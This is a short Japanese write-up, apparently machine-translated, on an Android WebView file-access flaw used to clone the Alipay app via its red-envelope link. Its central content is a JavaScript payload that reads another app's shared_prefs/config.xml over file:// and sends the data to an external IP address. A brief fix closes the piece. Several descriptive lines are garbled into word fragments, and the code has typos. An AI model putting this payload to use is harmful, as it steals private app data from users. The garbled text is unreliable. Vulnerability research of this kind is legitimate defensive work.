支付宝応用クローン2018/01/09

アリペイアプリケーションクローン

link

クローンを応用して、支付宝の自動お年玉のリンクから話します

プロセスの概要

自動現金入り封筒のリンク URL ， APP · URL Scheme · link
ドメイン間 · URL 、 、 ， ， · ，
Fileプロトコル · html WebView · setAllowUniversalAccessFromFileURLs · True File · File ， HTTP
攻撃の構想. html ， HTTP WebView html

脆弱性の前提

攻撃者は、攻撃されたAPPを外部から呼び出し、ローカルのhtmlファイル(例えば、お年玉のリンクを奪う)

をロードするように命令することができる.

攻撃アプリのsetAllowUniversalAccessFromFileURLs値はtrue

攻撃者は、攻撃された携帯電話にhtmlファイルをダウンロードし、Fileプロトコルによってアクセス可能な場所(他の脆弱性を利用して実現可能)

に保存する必要がある.

payload

<script>

    var arm ="file:///data/data/com.example.q00412688.myapplication/shared_prefs/config.xml";
    var xmlhttp;

    if (window.XMLHttpRequest)
    {
        xmlhttp=new XMLHttpRequest();
    }

    xmlhttp.onreadystatechange=function()
    {
        //alert("statusis"+xmlhttp.status);
        if (xmlhttp.readyState==4)
        {
            window.data=xmlhttp.responseText;
            alert(window.data);
            var url ="http://114.115.139.176/getdata.jsp?data="+window.data;
            var xmlhttp2;

            if(window.XMLHttpRequest)
            {
                xmlhttp2=newXMLHttpRequest();
            }

            xmlhttp2.onreadystatechange=function()
            {
                //alert("statusis"+xmlhttp.status);
                if(xmlhttp2.readyState==4)
                {
                    alert(xmlhttp2.responseText);
                }
            }

            xmlhttp2.open("GET",url);
            xmlhttp2.send(null);
        }
    }

    xmlhttp.open("GET",arm);
    xmlhttp.send(null);

script>
html>

修復シナリオ

setAllowFileAccessFromFileURLsとsetAllowUniversalAccessFromFileURLsの2つのプロパティ表示をFalseに設定します.